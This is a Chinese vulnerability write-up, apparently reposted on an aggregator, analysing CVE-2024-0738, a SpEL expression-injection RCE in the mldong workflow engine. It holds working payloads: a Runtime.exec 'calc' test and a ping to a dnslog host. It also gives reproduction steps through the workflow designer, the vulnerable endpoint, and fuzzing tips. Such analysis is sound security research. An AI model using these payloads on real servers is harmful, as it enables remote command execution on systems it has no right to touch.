CVE-2024-0738 Mldong ExpressionEngine RCE漏洞分析

漏洞描述

A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

个人开源mldong 1.0中发现一个严重漏洞。此问题影响文件 com/mldong/modules/wf/engine/model/DecisionModel.java 的 ExpressionEngine 函数。这种操纵会导致代码注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。

相关参考

NVD - CVE-2024-0738icon-default.png?t=N7T8https://nvd.nist.gov/vuln/detail/CVE-2024-0738

https://github.com/biantaibao/mldong_RCE/blob/main/RCE.mdicon-default.png?t=N7T8https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md

mldong开源项目地址

mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎icon-default.png?t=N7T8https://gitee.com/mldong/mldong

漏洞发现点

在mldong项目中DecisionModel类里有一个exec方法,它似乎可以执行表达式

 这个ExpressionUtil.eval引起了我们的兴趣。

本地建立文件,测试这行代码是否存在表达式注入。

 (测试环境最好在本项目中,保持环境包的一致性)


import cn.hutool.extra.expression.ExpressionUtil;import java.util.HashMap;
import java.util.Map;public class Test {public static void main(String[] args) {String expression = "T(java.lang.Runtime).getRuntime().exec('calc')";Map<String, Object> context = new HashMap<>();context.put("a", 1);context.put("b", 2);context.put("c", 3);Object result = ExpressionUtil.eval(expression, context);System.out.println(result);}
}

技巧:
        1.通过这个包ExpressionUtil在网上找寻使用示例代码或使用手册,再凭经验修改相关参数为表达式payload以造成命令执行。
        2.表达式的payload可以网上输入关键字收集,比如搜索cn.hutool.extra.expression.ExpressionUtil 表达式注入 历史漏洞什么。
        3.有了足够多的payload就可以做模糊测试了

本机计算机弹出,项目的确存在RCE漏洞

找寻调用接口

发现了漏洞点,如何寻找调用的接口,这里提供了几个技巧(还有什么技巧,请大佬补充)
1,右键找相关函数的usages,逐个分析
2,打上断点,前端点击功能看看那个接口会卡住

我这里右键找exec的usages

public abstract class NodeModel extends BaseModel implements Action {private String layout;// 布局属性(x,y,w,h)// 输入边集合private List<TransitionModel> inputs = new ArrayList<TransitionModel>();// 输出边集合private List<TransitionModel> outputs = new ArrayList<TransitionModel>();private String preInterceptors; // 节点前置拦截器private String postInterceptors; // 节点后置拦截器/*** 由子类自定义执行方法* @param execution*/abstract void exec(Execution execution);@Overridepublic void execute(Execution execution) {// 0.设置当前节点模型execution.setNodeModel(this);// 1. 调用前置拦截器execPreInterceptors(execution);// 2. 调用子类的exec方法exec(execution);// 3. 调用后置拦截器execPostInterceptors(execution);}

再次右键找execute的usages...

后面我就遇到了很多困难,因为java的继承类 接口实现类需要挨个分析 也不排除重名现象。如果想分析到接口层,可得下一番功夫。

这里我们先跳过这一步,来到前端的功能页面寻找相关的线索。....

待漏洞复现完毕后 我们再分析接口的调用!

.....

漏洞复现

进入后台管理在流程设计页面中新增流程设计

右键 设置流程属性  

添加这样的流程

点击条件判断的框

准备payload 打dns

T(java.lang.Runtime).getRuntime().exec('ping xxxx.dnslog.cn')  

保存 部署 准备执行  

 来到流程定义开始执行

 顺便添几个 点击确定

查看dnslog结果

ok rce成功复现

接口调用分析

看看它调用了什么接口

 post数据参考

POST /api/wf/processDefine/startAndExecute HTTP/1.1
Host: 
Connection: close

{"processDefineId":"1749714638596308993","f_startTime":["2024-01-23 ",null],"f_endTime":["2024-01-25 ",null],"f_reasonType":2,"f_day":2.5,"f_title":"test"}

来到后端

@PostMapping("/wf/processDefine/startAndExecute")
@ApiOperation(value = "启动流程实例")
@SaCheckPermission(value = {"wf:processDefine:startAndExecute","wf:processDesign:listByType"}, mode = SaMode.OR)
public CommonResult<?> startAndExecute(@RequestBody Dict args) {Long processDefineId = args.getLong(FlowConst.PROCESS_DEFINE_ID_KEY);args.remove(FlowConst.PROCESS_DEFINE_ID_KEY);processInstanceService.startAndExecute(processDefineId,args);return CommonResult.ok();
}

 跟进startAndExecute

public class ProcessInstanceServiceImpl extends ServiceImpl<ProcessInstanceMapper, ProcessInstance> implements ProcessInstanceService {
...private final ProcessTaskMapper processTaskMapper;private final ProcessCcInstanceMapper processCcInstanceMapper;@Override@Transactional(rollbackFor = Exception.class)public void startAndExecute(Long processDefineId, Dict args) {String operator = LoginUserHolder.getUserId().toString();FlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);ProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId,operator,args);List<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(),new String[]{});// 取任务自动执行processTaskList.forEach(processTask -> {args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);});}
...
}

在方法中,首先获取当前登录用户的操作员 ID:

javaCopy CodeString operator = LoginUserHolder.getUserId().toString();

然后,获取 FlowEngine 实例:

javaCopy CodeFlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);

接下来,使用 flowEngine 实例的 startProcessInstanceById 方法启动一个流程实例,并传入 processDefineIdoperatorargs 参数:

javaCopy CodeProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId, operator, args);

然后,使用 flowEngine 实例的 processTaskService() 方法获取正在进行中的任务列表:

javaCopy CodeList<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(), new String[]{});

接下来,对任务列表进行遍历,并自动执行每个任务:

javaCopy CodeprocessTaskList.forEach(processTask -> {args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());flowEngine.executeProcessTask(processTask.getId(), FlowConst.AUTO_ID, args);
});

跟进 flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);

public class FlowEngineImpl implements FlowEngine {protected Configuration configuration;private ProcessDefineService processDefineService;private ProcessInstanceService processInstanceService;private ProcessTaskService processTaskService;
...@Override@Transactional(rollbackFor = Exception.class)public List<ProcessTask> executeProcessTask(Long processTaskId, String operator, Dict args) {Execution execution = execute(processTaskId,operator,args);if(execution == null) return Collections.emptyList();ProcessModel processModel = execution.getProcessModel();// 7. 根据流程任务名称获取对应的任务节点模型NodeModel nodeModel = processModel.getNode(execution.getProcessTask().getTaskName());// 8. 调用节点模型执行方法nodeModel.execute(execution);return execution.getProcessTaskList();}
...
}

这段代码首先调用 execute 方法来执行指定的流程任务,并将执行结果保存在一个 Execution 对象中。如果 execute 方法返回的 Execution 对象为 null,则直接返回一个空列表。

接着,代码从 Execution 对象中获取了当前任务所属的流程模型(ProcessModel 对象),并根据当前任务名称获取了对应的节点模型(NodeModel 对象)。最后,代码调用了该节点模型的 execute 方法来完成任务的执行。

需要注意的是,该方法使用了 @Transactional 注解来添加事务支持,保证代码在执行过程中出现异常时可以进行回滚。同时,该方法还使用了 Dict 类型的参数来传递一些额外的参数信息,以便在执行过程中进行相关操作。

 跟进Execution execution = execute(processTaskId,operator,args); 看看对参数的处理

public class FlowEngineImpl implements FlowEngine {protected Configuration configuration;private ProcessDefineService processDefineService;private ProcessInstanceService processInstanceService;private ProcessTaskService processTaskService;
.../*** 生成执行对象* @param processTaskId* @param operator* @param args* @return*/private Execution execute(Long processTaskId, String operator, Dict args) {// 1.1 根据id查询正在进行中的流程任务ProcessTask processTask = processTaskService.getById(processTaskId);if(processTask == null || !ProcessTaskStateEnum.DOING.getCode().equals(processTask.getTaskState())) {throw new JFlowException(WfErrEnum.NOT_FOUND_DOING_PROCESS_TASK);}// 1.2 判断是否可以执行任务if(!processTaskService.isAllowed(processTask,operator)) {// 当前参与者不能执行该流程任务throw new JFlowException(WfErrEnum.NOT_ALLOWED_EXECUTE);}// 2. 根据流程任务查询流程实例ProcessInstance processInstance = processInstanceService.getById(processTask.getProcessInstanceId());// 3. 根据流程实例查询流程定义ProcessDefine processDefine = processDefineService.getById(processInstance.getProcessDefineId());// 4. 将流程定义文件转成流程模型ProcessModel processModel = ModelParser.parse(processDefine.getContent());// 5. 将流程任务状态修改为已完成processTaskService.finishProcessTask(processTaskId,operator,args);processTask.setTaskState(ProcessTaskStateEnum.FINISHED.getCode());// 6. 根据流程定义、实例、任务构建执行参数对象Execution execution = new Execution();execution.setProcessModel(processModel);execution.setProcessInstance(processInstance);execution.setProcessInstanceId(processInstance.getId());execution.setProcessTask(processTask);execution.setProcessTaskId(processTaskId);execution.setOperator(operator);execution.setEngine(this);Dict processInstanceVariable = JSONUtil.toBean(processInstance.getVariable(),Dict.class);Dict newArgs = Dict.create();newArgs.putAll(processInstanceVariable);newArgs.putAll(args);execution.setArgs(newArgs);// 如果提交参数中存在f_前辍参数,则更新到流程实例变量中Dict addArgs = Dict.create();args.forEach((key,value)->{if(key.startsWith(FlowConst.FORM_DATA_PREFIX)) {addArgs.put(key,value);}});if(ObjectUtil.isNotEmpty(addArgs)) {processInstanceService.addVariable(processInstance.getId(), addArgs);}return execution;}
...
}

 得到execution对象,返回进入nodeModel.execute(execution);

public abstract class NodeModel extends BaseModel implements Action {private String layout;// 布局属性(x,y,w,h)// 输入边集合private List<TransitionModel> inputs = new ArrayList<TransitionModel>();// 输出边集合private List<TransitionModel> outputs = new ArrayList<TransitionModel>();private String preInterceptors; // 节点前置拦截器private String postInterceptors; // 节点后置拦截器
/*** 由子类自定义执行方法* @param execution*/
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {// 0.设置当前节点模型execution.setNodeModel(this);// 1. 调用前置拦截器execPreInterceptors(execution);// 2. 调用子类的exec方法exec(execution);// 3. 调用后置拦截器execPostInterceptors(execution);
}

进入exec方法,这就来到了触发漏洞点的地方

public class DecisionModel extends NodeModel {private String expr; // 决策表达式private String handleClass; // 决策处理类@Overridepublic void exec(Execution execution) {// 执行决策节点自定义执行逻辑boolean isFound = false;String nextNodeName = null;if(StrUtil.isNotEmpty(expr)) {Object obj = ExpressionUtil.eval(expr, execution.getArgs());//漏洞触发点nextNodeName = Convert.toStr(obj,"");} else if(StrUtil.isNotEmpty(handleClass)) {DecisionHandler decisionHandler = ReflectUtil.newInstance(handleClass);nextNodeName = decisionHandler.decide(execution);}for(TransitionModel transitionModel: getOutputs()){if (StrUtil.isNotEmpty(transitionModel.getExpr()) && Convert.toBool(ExpressionUtil.eval(transitionModel.getExpr(), execution.getArgs()), false)) {// 决策节点输出边存在表达式,则使用输出边的表达式,true则执行isFound = true;transitionModel.setEnabled(true);transitionModel.execute(execution);} else if(transitionModel.getTo().equalsIgnoreCase(nextNodeName)) {// 找到对应的下一个节点isFound = true;transitionModel.setEnabled(true);transitionModel.execute(execution);}}if(!isFound) {// 找不到下一个可执行路线throw new JFlowException(WfErrEnum.NOT_FOUND_NEXT_NODE);}}
}
总结

本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。

本次漏洞研究发的包有点复杂,就不附赠poc。有想法的小伙伴可以尝试一下

至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...

欢迎大佬评论区留言,

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/642096.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Vue+Element(el-switch的使用)+springboot

Vue+Element(el-switch的使用)+springboot

目录 1、编写模板 2、发送请求 3、后端返数据 1.Controller类 2.interface接口&#xff08;Service层接口&#xff09; 3.Service&#xff08;接口实现&#xff09; 4.interface接口&#xff08;Mapper层接口&#xff09; 5.xml 6.效果 4、el-switch属性 1、编写模板 …
阅读更多...
数字图像处理(实践篇)二十六 使用cvlib进行人脸检测、性别检测和目标检测

数字图像处理(实践篇)二十六 使用cvlib进行人脸检测、性别检测和目标检测

目录 1 安装cvlib 2 涉及的函数 3 实践 4 其他 cvlib一个简单,高级,易于使用的开源Python计算机视觉库。 1 安装cvlib # 安装依赖pip install opencv-python tensorflow# 安装cvlibpip install cvlib</
阅读更多...
iLO 安装中文固件包

iLO 安装中文固件包

前言 安装中文版本的安装包&#xff0c;需要把对应的ilo安装到固定的版本上&#xff0c;ilo的版本是2.70。必须是这个版本&#xff1b; 如果不是这个版本就需要刷到对应的ilo版本 下载对应的固件包。 到这个界面选择文件&#xff0c;然后点击上载。 以上就是刷系统包的步骤。 …
阅读更多...
MATLAB 和 Octave 之间的区别

MATLAB 和 Octave 之间的区别

MATLAB 和 Octave 之间的区别 MATLAB 和 Octave 有一些区别&#xff0c;但大多数都是相同的。你可以说 Octave 是 MATLAB 的免费版本&#xff0c;语法几乎与 MATLAB 相同。但是 MATLAB 比 Octave 具有更多功能&#xff0c;就像具有 Simulink 一样&#xff0c;后者用于开发和分…
阅读更多...
前端基于XLSX实现数据导出到Excel表格,以及提示“文件已经被损坏,无法打开”的解决方法

前端基于XLSX实现数据导出到Excel表格,以及提示“文件已经被损坏,无法打开”的解决方法

文章目录 一、vue实现导出excel1、前端实现1、安装xlsx依赖2、引入3、方法4、使用4.1、将一个二维数组转成sheet4.2、将一个对象数组转成sheet4.3、合并单元格4.4、一次导出多个sheet 5、支持的文件格式 2、后端实现 二、导出文件损坏1、前端请求导出接口&#xff0c;增加返回类…
阅读更多...
宝塔FTP文件传输服务结合cpolar内网穿透实现远程连接本地服务

宝塔FTP文件传输服务结合cpolar内网穿透实现远程连接本地服务

⛳️ 推荐 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到网站。 文章目录 ⛳️ 推荐1. Linux安装Cpolar2. 创建FTP公网地址3. 宝塔FTP服务设置4. FTP服务远程连接小结 5. 固定FTP公网地址6. 固…
阅读更多...
C++ 20 Module

C++ 20 Module

头文件包含一直是C/C的传统&#xff0c;它使代码声明与实现分离&#xff0c;但它有一个非常大的问题就是会被重复编译&#xff0c;拖累编译速度。 通常一个标准头文件iostream展开后可能达几十万甚至上百万行。笔者使用下面的示例进行测试&#xff0c;新建一个main.cc&#xf…
阅读更多...
C++:迭代器失效问题

C++:迭代器失效问题

目录 1.vector迭代器失效问题 1.底层空间改变 ​编辑 2.指定位置元素的删除操作 2.Linux下的迭代器失效检测 1.扩容 2.删除 3.解决方法 1.vector迭代器失效问题 迭代器的主要作用就是让算法能够不用关心底层数据结构&#xff0c;其底层实际就是一个指针&#xff0c;或者是…
阅读更多...
前端使用css去除input框的默认样式

前端使用css去除input框的默认样式

关键点&#xff1a; /* 关键点&#xff0c;让输入框无边框 */outline:none; border:none; 1.效果图 2.html <div class"container"><input type"text" placeholder"请输入用户名"><input type"text" placeholder&q…
阅读更多...
springboot+mysql校园社团信息管理系统-计算机毕业设计源码62756

springboot+mysql校园社团信息管理系统-计算机毕业设计源码62756

目 录 摘要 第1章 绪论 1.1 研究背景 1.2 研究意义 1.3论文结构与章节安排 第2章 相关技术 ....... 2.1开发技术 2.2 Java简介 2.3 MVVM模式 2.4 B/S结构 2.5 MySQL数据库 2.6 SpringBoot框架介绍 第3章 系统分析 6 3.1 可行性分析 6 3.2 系统流程分析 6 3.3 …
阅读更多...
详解华为铁三角工作法完全解密.ppt

详解华为铁三角工作法完全解密.ppt

华为铁三角工作法是华为“以客户为中心”的思想在客户界面的集中体现。是一种以客户经理、方案经理和交付经理为核心的销售方法&#xff0c;将为客户服务所需要的主要能力&#xff0c;一直延伸到客户界面&#xff0c;并统一运作。 华为铁三角工作法的核心&#xff1a; - 让听…
阅读更多...
CC工具箱使用指南:【现状规划用地变化检查(村规)】

CC工具箱使用指南:【现状规划用地变化检查(村规)】

一、简介 在规划工作中&#xff0c;有一个普遍性的需求&#xff0c;就是需要检查规划前后在用地上究竟发生了哪些变化。 这一点很重要&#xff0c;不仅是要展示给别人看&#xff0c;自己也要十分注意。 规划方案完成后&#xff0c;一定要进行用地变化的检查&#xff0c;曾经…
阅读更多...
定时任务组件Quartz

定时任务组件Quartz

1.Quartz介绍 官网&#xff1a;Quartz Enterprise Job Scheduler 2.Quartz框架的使用思路 1&#xff09;job - 任务 - 你要做什么事&#xff1f; 2&#xff09;Trigger - 触发器 - 你什么时候去做&#xff1f; 3&#xff09;Scheduler - 任务调度 - 你什么时候需要去做什么…
阅读更多...
NVM (Node Version Manager) 安装使用

NVM (Node Version Manager) 安装使用

博文目录 文章目录 管理工具安装使用 管理工具 GitHub, nvm-windows nvm-windows: Similar (not identical) to nvm, but for Windows 管理 Node.js 版本有多种工具可选择, 其中使用最广泛的是 nvm, 目前 72.3k Star, 不支持 Windows 系统, nvm-windows, 是其他大佬为 Windows…
阅读更多...
ubuntu安装kibana

ubuntu安装kibana

1、安装elastic search7 参考&#xff1a;elastic search入门-CSDN博客 2、安装kibana&#xff0c;版本对不上&#xff0c;不匹配&#xff0c;不能正常启动。 kibana要改成7.11.1版本的试试。 nohup wget https://artifacts.elastic.co/downloads/kibana/kibana-7.11.1-linu…
阅读更多...
Spring-配置文件

Spring-配置文件

一、引子 了解完Spring的基本概念后&#xff0c;我们紧接着来了解Spring中的核心文件--Spring配置文件。 二、配置Bean 我们在上一节Spring的基本概念中快速使用了一下Spring&#xff0c;其中我们在配置文件中主要涉及到就是Bean标签的配置&#xff1a;主要的配置字段有id, …
阅读更多...
Servlet系列:生命周期(init、 service、destroy)详解

Servlet系列:生命周期(init、 service、destroy)详解

Servlet的生命周期是由Web容器&#xff08;如Tomcat&#xff09;管理的&#xff0c;包括以下三个阶段&#xff1a; 加载和实例化&#xff1a;当Web应用程序启动时&#xff0c;Web容器会加载和实例化Servlet。加载和实例化过程可以在应用程序启动时自动完成&#xff0c;也可以通…
阅读更多...
Mac上如何设置映射某个网站站点域名的IP

Mac上如何设置映射某个网站站点域名的IP

最近某常用的站点换 IP 了&#xff0c;但是 DNS 服务器还没有修改&#xff0c;这就导致无法访问&#xff08;换 DNS 服务器也不行&#xff09;。在用了一段时间的 IP 访问之后&#xff0c;还是没好&#xff0c;不知道是 DNS 污染还是咋了&#xff0c;所以最后还是手动改一下吧。…
阅读更多...
MySQL定期整理磁盘碎片

MySQL定期整理磁盘碎片

MySQL定期整理磁盘碎片&#xff1a;提升数据库性能的终极指南 MySQL作为一个强大的关系型数据库管理系统&#xff0c;在长时间运行后可能会产生磁盘碎片&#xff0c;影响数据库性能。本博客将深入讨论如何定期整理MySQL磁盘碎片&#xff0c;以确保数据库的高效运行。我们将介绍…
阅读更多...
mac滚动截图

mac滚动截图

参考博客 https://www.zhihu.com/question/313673726/answer/2938671835 首先去AppStore搜索 iShot 这个也是要钱的&#xff0c;不过我输入appleID后&#xff0c;并没有扣我钱&#xff0c;不知道设么回事 然后打开iShot 点击观看视频&#xff0c;然后mac会自动打开一个新的…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023